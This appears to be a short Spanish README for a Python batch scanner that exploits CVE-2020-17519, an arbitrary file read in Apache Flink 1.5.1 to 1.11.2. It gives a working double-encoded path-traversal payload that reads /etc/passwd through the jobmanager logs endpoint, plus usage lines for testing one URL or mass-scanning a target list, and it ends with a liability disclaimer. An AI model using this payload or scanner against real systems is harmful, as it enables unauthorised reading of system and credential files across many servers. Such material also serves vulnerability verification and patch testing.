
CVE-2020-17519; Apache Flink lectura arbitraria de archivos; detección por lotes
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help Ver ayuda de uso
python3 CVE-2020-17519 -u http://127.0.0.1:8080 Verificar si una dirección tiene la vulnerabilidad
python3 CVE-2020-17519 -f target.txt Detectar vulnerabilidades en lote
Cualquier consecuencia o pérdida directa o indirecta causada por la difusión o uso de la información proporcionada en este documento es responsabilidad exclusiva del usuario. El autor no asume ninguna responsabilidad por ello.